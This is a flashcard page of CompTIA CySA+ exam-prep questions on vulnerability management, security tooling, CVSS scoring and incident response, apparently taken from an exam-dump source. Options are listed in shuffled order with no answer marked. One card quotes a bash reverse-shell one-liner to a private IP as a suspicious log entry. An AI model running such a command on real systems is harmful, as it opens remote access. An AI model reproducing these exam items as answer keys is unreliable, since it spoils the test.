Back to overview

CompTIA CySA+ CS03

All questions without description (e.g. Question #1) are from the premium version of Exam Topics. I always choosed the community answer if possible for them. The rest is from the specific documents, written in the header of each question.

Subject
No category / Others
Language of creation
English
342 flashcards No ratings yet 0 views
Add to my sets

Sign in to add this set to your collection. You will return here afterwards.

Cards in this set

Card 101

Question

Question #100

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Answer

  • D. Patch the proxy.
  • A. Leave the proxy as is.
  • B. Decomission the proxy.
  • C. Migrate the proxy to the cloud.

Card 102

Question

Question #101

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

Answer

  • B. Network segmentation
  • A. Access rights
  • C. Time synchronization
  • D. Invalid playbook

Card 103

Question

Question #102

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

Answer

  • A. SOAR
  • B. SIEM
  • D. IoC
  • C. SLA

Card 104

Question

Question #103

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

Answer

  • D. There are no compensating controls in place for the OS.
  • A. Any discovered vulnerabilities will not be remediated.
  • C. Support will not be available for the critical machinery.
  • B. An outage of machinery would cost the organization money.

Card 105

Question

Question #104

Which of the following describes the best reason for conducting a root cause analysis?

Answer

  • A. The root cause analysis ensures that proper timelines were documented.
  • B. The root cause analysis allows the incident to be properly documented for reporting.
  • C. The root cause analysis develops recommendations to improve the process.
  • D. The root cause analysis identifies the contributing items that facilitated the event.

Card 106

Question

Question #105

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Answer

  • B. Data enrichment
  • A. Command and control
  • C. Automation
  • D. Single sign-on

Card 107

Question

Question #106

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?

Answer

  • A. SIEM
  • B. CASB
  • D. EDR
  • C. SOAR

Card 108

Question

Question #107

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Answer

  • A. #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"
  • B. #!/bin/bash ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"
  • C. #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK"
  • D. #!/bin/bash netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

Card 109

Question

 

Question #108

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Answer

  • D. Roll out an IDS.
  • A. Implement segmentation with ACLs.
  • C. Deploy MFA to cloud storage locations.
  • B. Configure logging and monitoring to the SIEM.

Card 110

Question

Question #109

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

Answer

  • A. Deploy a WAF to the front of the application.
  • D. Replace the MD5 with digital signatures.
  • B. Replace the current MD5 with SHA-256.
  • C. Deploy an antivirus application on the hosting system.

Card 111

Question

Question #110

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

Answer

  • A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
  • C. Check configurations to determine whether USB ports are enabled on company assets.
  • D. Review logs to see whether this exploitable vulnerability has already impacted the company.
  • B. Write a removable media policy that explains that USBs cannot be connected to a company asset.

Card 112

Question

Question #111

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

Answer

  • B. TCPDump
  • A. Nmap
  • D. EDR
  • C. SIEM

Card 113

Question

Question #112

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:



Which of the following vulnerability types is the security analyst validating?

Answer

  • A. Directory traversal
  • B. XSS
  • C. XXE
  • D. SSRF

Card 114

Question

Question #113

Which of the following is the most important factor to ensure accurate incident response reporting?

Answer

  • B. A guideline for regulatory reporting
  • D. A well-developed executive summary
  • A. A well-defined timeline of the events
  • C. Logs from the impacted system

Card 115

Question

Question #114

 

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

Answer

  • A. grep [IP address] packets.pcap
  • B. cat packets.pcap | grep [IP Address]
  • C. tcpdump -n -r packets.pcap host [IP address]
  • D. strings packets.pcap | grep [IP Address]

Card 116

Question

Question #115

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Answer

  • C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Card 117

Question

Question #116

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)

Answer

  • A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
  • F. Examine the SPF, DKIM, and DMARC fields from the original email
  • B. Review the headers from the forwarded email
  • D. Review the Content-Type header
  • E. Evaluate the HELO or EHLO string of the connecting email server
  • C. Examine the recipient address field

Card 118

Question

Question #117

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Answer

  • A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
  • B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
  • C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
  • D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Card 119

Question

Question #118

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

Answer

  • B. Create a compensating control item until the system can be fully patched
  • A. Integrate an IT service delivery ticketing system to track remediation and closure
  • D. Request an exception and manually patch each system
  • C. Accept the risk and decommission current assets as end of life

Card 120

Question

Question #119

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

Answer

  • A. Join an information sharing and analysis center specific to the company's industry
  • C. Add data enrichment for IPs in the ingestion pipeline
  • B. Upload threat intelligence to the IPS in STIX'TAXII format
  • D. Review threat feeds after viewing the SIEM alert

How to use this set

Read the preview and check whether the content and answers suit your learning goal. You can add the public set to your sets to study it. Your account shows the available actions.

Rejoining the server...

Rejoin failed... trying again in seconds.

Failed to rejoin.
Please retry or reload the page.

The session has been paused by the server.

Failed to resume the session.
Please reload the page.